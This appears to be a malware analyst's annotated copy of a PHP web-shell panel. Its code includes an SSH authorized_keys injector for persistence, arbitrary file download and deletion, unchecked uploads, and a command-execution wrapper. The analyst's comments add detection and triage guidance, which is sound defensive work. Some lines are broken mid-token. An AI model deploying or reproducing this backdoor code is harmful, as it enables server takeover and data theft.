php
// Analyst note: login gate of the panel. A session is started, then the
// unsalted MD5 of the POSTed 'password' field is compared (loose '==') with a
// hard-coded digest. On a match the plaintext password itself is stored in
// $_SESSION['password']; both branches redirect to '?'.
// The literal digest below is a stable string to hunt for in web roots and
// upload directories.
// NOTE(review): header() does not end the request and no exit follows, and
// nothing in this excerpt reads $_SESSION['password'] before the request
// handlers further down run. Requests to those handlers in access logs can
// therefore not be attributed to the password holder alone; whether later
// code gates the UI on the session is not visible from here.
session_start();
// error_reporting(0);
if (isset($_POST['password'])) {
if (md5($_POST['password']) == 'bf211b896d1233e0b9fc5acb604b0329') {
$_SESSION['password'] = $_POST['password'];
header("Location: ?");
} else {
header("Location: ?");
}
}
// ssh key injector
// Analyst note: persistence handler. When a POST carries 'inject_key', the raw
// 'pub_key' field is appended, without any validation, to
// .ssh/authorized_keys in the parent directory of DOCUMENT_ROOT; the .ssh
// directory is created first when it is missing.
// Triage: inspect authorized_keys (and a recently created .ssh directory) one
// level above the web root for entries or mtimes that line up with POST
// requests carrying these field names, and alert on the web-server account
// writing to that file. The outcome is reported through a redirect whose
// 'msg' parameter is base64-encoded status text.
if (isset($_POST['inject_key'])) {
$key = $_POST['pub_key'];
// TODO: make this method works on windows servers
// this is only for linux server
chdir($_SERVER['DOCUMENT_ROOT'] . "/..");
if (file_exists(getcwd() . "/.ssh")) {
if (!is_writable((getcwd() . '/.ssh'))) {
header("Location: ?view=injector&action=ssh&msg=" . base
64_encode("permission denied"));
die();
}
} else {
if (!is_writable(getcwd())) {
header("Location: ?view=injector&action=ssh&msg=" . base
64_encode("permission denied"));
die();
}
mkdir(getcwd() . "/.ssh");
}
// "a+" appends, so existing keys are kept and the new text is added after them.
$key_file = fopen(getcwd() . "/.ssh/authorized_keys", "a+");
fwrite($key_file, $key);
fclose($key_file);
// Return to the working directory the panel keeps in the session.
chdir($_SESSION['cd']);
header("Location: ?view=injector&action=ssh&msg=" . base64_encode("ssh k
ey injected successfully!"));
}
// Analyst note: file-read handler. $path is the empty string, so the
// caller-supplied $filename is used unchanged as the path to stream; any file
// the PHP process can read is served as an attachment, after which the script
// exits. Nothing is done for an empty $filename; a missing file produces a
// redirect carrying a base64 'msg'.
// Observable response traits: 'Content-Encoding: none', a Content-Type of
// 'application/' followed by the text after the last dot of the name, and a
// Content-Disposition built from the raw name.
// NOTE(review): Last-Modified is computed from $path (the empty string), not
// from the file being sent - presumably it comes out as the Unix epoch;
// confirm on a test system before using it as a network signature.
function download($filename){
if(!empty($filename)){
// Specify file path.
$path = ''; // '/uplods/'
$download_file = $path.$filename;
// Check file is exists on given path.
if(file_exists($download_file)) {
// Getting file extension.
$extension = explode('.',$filename);
$extension = $extension[count($extension)-1];
// For Gecko browsers
header('Content-Transfer-Encoding: binary');
header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . '
GMT');
// Supports for download resume
header('Accept-Ranges: bytes');
// Calculate File size
header('Content-Length: ' . filesize($download_file));
header('Content-Encoding: none');
// Change the mime type if the file is not PDF
header('Content-Type: application/'.$extension);
// Make the browser display the Save As dialog
header('Content-Disposition: attachment; filename=' . $filename);
readfile($download_file);
exit;
}
else {
header("Location: ?msg=" . base64_encode('File does not exists on given pa
th'));
}
}
}
// Analyst note: routing for two GET actions. A request with both 'view' and
// 'action' set, where 'action' matches the download literal, passes the raw
// 'view' value to download() as the path to serve. 'action=logout' destroys
// the session, redirects to '?' and stops.
// Triage: 'view' holds a plain, un-encoded path in the query string, so
// access logs show directly which files were requested through this route.
if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'down
load') {
download($_GET['view']);
}
if (isset($_GET['action']) AND $_GET['action'] == 'logout') {
session_destroy();
header("Location: ?");
die();
}
// Analyst note: recursive delete used by the 'rmdir' handler. Every entry
// other than '.' and '..' is unlinked, or recursed into when it is a
// directory; the directory itself is removed last.
// Returns false when no directory handle was obtained, true otherwise. The
// results of unlink() and rmdir() are not checked, so true does not prove
// that anything was actually removed - rely on filesystem evidence, not on
// the panel's status message, when scoping damage.
// NOTE(review): the is_dir() test has no braces and guards only the opendir()
// line; for a non-directory argument $dir_handle is never assigned before it
// is tested.
function delete_directory($dirname) {
if (is_dir($dirname))
$dir_handle = opendir($dirname);
if (!$dir_handle)
return false;
while($file = readdir($dir_handle)) {
if ($file != "." && $file != "..") {
if (!is_dir($dirname."/".$file))
unlink($dirname."/".$file);
else
delete_directory($dirname.'/'.$file);
}
}
closedir($dir_handle);
rmdir($dirname);
return true;
}
// Analyst note: GET-driven filesystem handlers. Paths arrive base64-encoded in
// the query string ('cd', 'rmdir', 'rmfile', 'rmfile<N>', 'from'), and results
// are reported through a redirect whose 'msg' parameter is base64 text.
// Triage: decoding these parameters from access logs reconstructs which
// directories were browsed and which files were deleted or renamed; the
// single-item delete messages embed the resolved path as well.

// 'cd': the decoded value becomes the panel's working directory, kept in the
// session without validation.
if (isset($_GET['cd'])) {
$_SESSION['cd'] = base64_decode($_GET['cd']);
}
// 'rmdir': resolves the decoded path with realpath() and, when it exists and
// is writable, removes it recursively through delete_directory().
if (isset($_GET['rmdir'])) {
$file = realpath(base64_decode($_GET['rmdir']));
if (file_exists($file)) {
if (is_writable($file)) {
delete_directory($file);
header("Location: ?msg=" . base64_encode($file . " has b
een deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permission den
ied!"));
}
}
}
// 'rmfile': same checks as above, then unlink() on a single path.
if (isset($_GET['rmfile'])) {
$file = realpath(base64_decode($_GET['rmfile']));
if (file_exists($file)) {
if (is_writable($file)) {
unlink($file);
header("Location: ?msg=" . base64_encode($file . " has b
een deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permission den
ied!"));
}
}
}
// 'multirmfile': the value is a count N; parameters 'rmfile0' .. 'rmfile<N-1>'
// are processed in turn. Directories go through rmdir() (not recursive here),
// everything else through unlink().
if (isset($_GET['multirmfile'])) {
for ($i = 0; $i < intval($_GET['multirmfile']); $i++) {
$file = realpath(base64_decode($_GET['rmfile' . $i]));
if (file_exists($file)) {
if (is_writable($file)) {
if (is_dir($file)) {
rmdir($file);
} else {
unlink($file);
}
header("Location: ?msg=" . base64_encode("select
ed file(s) has been deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permis
sion denied!"));
}
}
}
}
// Switch to the directory remembered in the session before the handlers below.
if (isset($_SESSION['cd'])) {
chdir($_SESSION['cd']);
}
// 'from' / 'to': rename. 'from' is base64-decoded, 'to' is used exactly as
// received and appended to the current working directory.
if (isset($_GET['to']) AND isset($_GET['from'])) {
$from = base64_decode($_GET['from']);
$to = $_GET['to'];
if (is_writable($from)) {
if (file_exists($from)) {
rename($from, getcwd() . '/' . $to);
header('Location: ?msg=' . base64_encode("file renamed s
uccessfully!"));
} else {
header("Location: ?msg=" . base64_encode("file doesn't e
xist"));
}
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
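/**
 * Render a byte count as a short human-readable size string.
 *
 * Values of 1024 and above are scaled to KB, MB or GB (binary multiples) and
 * printed with two decimals; values from 1 up to 1023 are printed as-is with
 * a ' B' suffix; anything below 1 yields '0 B'.
 *
 * The unit suffixes are written as single-line literals: the listing had the
 * KB suffix broken across two lines, which put a newline into the output.
 * The separate "> 1" and "== 1" branches produced the same text and are merged.
 *
 * @param int|float|string|false $bytes Size in bytes (e.g. a filesize() result).
 * @return string Formatted size such as '2.00 KB' or '512 B'.
 */
function formatSizeUnits($bytes) {
    // Ordered from the largest unit down so the first match wins.
    $units = [
        1073741824 => ' GB',
        1048576    => ' MB',
        1024       => ' KB',
    ];
    foreach ($units as $threshold => $suffix) {
        if ($bytes >= $threshold) {
            return number_format($bytes / $threshold, 2) . $suffix;
        }
    }
    if ($bytes >= 1) {
        return $bytes . ' B';
    }
    return '0 B';
}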
/**
 * Turn a numeric file mode into a ten-character `ls -l`-like string.
 *
 * The first character is the file type taken from the 0xF000 bits; note that
 * this function labels regular files 'r' and unrecognised types 'u'. The
 * remaining nine characters are the owner, group and world read/write/execute
 * flags, with setuid/setgid shown as 's'/'S' and the sticky bit as 't'/'T'
 * (lower case when the execute bit is also set).
 *
 * @param int $perms Mode value, e.g. as returned by fileperms().
 * @return string Type letter followed by nine permission characters.
 */
function formatPerms($perms) {
    $typeLetters = [
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => 'r', // regular
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    ];
    $typeBits = $perms & 0xF000;
    $result = isset($typeLetters[$typeBits]) ? $typeLetters[$typeBits] : 'u';

    // Per class: read bit, write bit, execute bit, special bit, and the
    // letters shown for the special bit with / without execute.
    $classes = [
        [0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'], // owner (setuid)
        [0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'], // group (setgid)
        [0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'], // world (sticky)
    ];
    foreach ($classes as $class) {
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $class;
        $result .= ($perms & $readBit) ? 'r' : '-';
        $result .= ($perms & $writeBit) ? 'w' : '-';
        if ($perms & $specialBit) {
            $result .= ($perms & $execBit) ? $withExec : $withoutExec;
        } else {
            $result .= ($perms & $execBit) ? 'x' : '-';
        }
    }
    return $result;
}
/**
 * Format a file's last-modification time as "M-d-Y H:i:s".
 *
 * @param string $filename Path to inspect.
 * @return string|null Formatted timestamp, or null when the path does not exist.
 */
function modifiedDate($filename) {
    // Guard first: a missing path yields null, as the original did implicitly.
    if (!file_exists($filename)) {
        return null;
    }
    $mtime = filemtime($filename);
    return date("M-d-Y H:i:s", $mtime);
}
// Analyst note: command-execution wrapper. The string $in is handed to the
// first primitive that is available, in this order: exec, passthru, system,
// shell_exec, popen. Whatever output was captured is returned as a string
// (empty when none of the branches ran). The '@' prefixes suppress PHP
// warnings from these calls.
// Detection: shell or utility processes spawned as children of the web server
// or PHP worker. Hardening: where the hosted application does not need them,
// list all five functions in disable_functions, since the function_exists()
// probes below simply move on to the next one.
function ex($in) {
$out = '';
if(function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
// Analyst note: tool lookup. Runs 'which <p>' through ex() and returns the
// command output when it is non-empty, otherwise false. $p is concatenated
// into the command line without escaping. Callers are outside this excerpt.
function which($p) {
$path = ex('which '.$p);
if(!empty($path))
return $path;
return false;
}
// Analyst note: write-side handlers. Each one acts on request parameters and
// reports through a redirect whose 'msg' parameter is base64 text.
// Triage: correlate POSTs carrying 'edit' or 'upload', and GETs carrying
// 'touch' or 'mkdir_path', with file and directory mtimes under any location
// the web-server account can write to; files created or modified this way
// should be treated as untrusted.

// 'edit': overwrites the file named in POST 'dest' with POST 'content'
// (mode 'w' truncates first).
if (isset($_POST['edit'])) {
if (is_writable($_POST['dest'])) {
$file = fopen($_POST['dest'], 'w');
fwrite($file, $_POST['content']);
fclose($file);
header('Location: ?msg=' . base64_encode("file saved!"));
} else {
header('Location: ?msg=' . base64_encode("permission denied!"));
}
}
// 'touch' + 'file': creates an empty file named 'file' inside the
// base64-decoded 'touch' directory. The writability test is made on dirname()
// of that directory, i.e. on its parent.
if (isset($_GET['touch']) AND isset($_GET['file'])) {
if (is_writable(dirname(base64_decode($_GET['touch'])))) {
$content = "";
$fp = fopen(base64_decode($_GET['touch']) . '/' . $_GET['file'],
"wb");
fwrite($fp,$content);
fclose($fp);
header("Location: ?msg=" . base64_encode($_GET['file'] . " has b
een created!"));
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
// 'mkdir_path' + 'folder': creates a directory, with the same parent-directory
// writability test as above.
if (isset($_GET['mkdir_path']) AND isset($_GET['folder'])) {
if (is_writable(dirname(base64_decode($_GET['mkdir_path'])))) {
mkdir(base64_decode($_GET['mkdir_path']) . '/' . $_GET['folder']
);
header("Location: ?msg=" . base64_encode($_GET['folder'] . " fol
der has been created!"));
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
// 'upload': moves the uploaded file into POST 'path' under the client-supplied
// name. No type or extension check is made and the exists-check is commented
// out, so an existing file of the same name is replaced.
if (isset($_POST['upload'])) {
if (is_writable($_POST['path'])) {
$files = @$_FILES["files"];
$fullpath = $_POST['path'] . "/" . $files["name"];
// if (file_exists($fullpath)) {
// header("Location: ?msg=" . base64_encode("file already e
xist!"));
// die();
// }
if ($files["name"] != '') {
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
header("Location: ?msg=" . base64_encode("file u
ploaded to $fullpath"));
} else {
header("Location: ?msg=" . base64_encode("an err
or occured!"));
}
}
} else {
// NOTE(review): the text is passed through base64_decode() before being
// re-encoded, so this 'msg' will not decode to the readable phrase.
header("Location: ?msg=" . base64_encode(base64_decode('permissi
on denied!')));
}
}
// 'qpath': quick-jump form; redirects to the 'cd' handler with the path
// base64-encoded.
if ($_SERVER['REQUEST_METHOD'] == 'POST' AND isset($_POST['qpath'])) {
header("Location: ?cd=" . base64_encode($_POST['qpath']));
}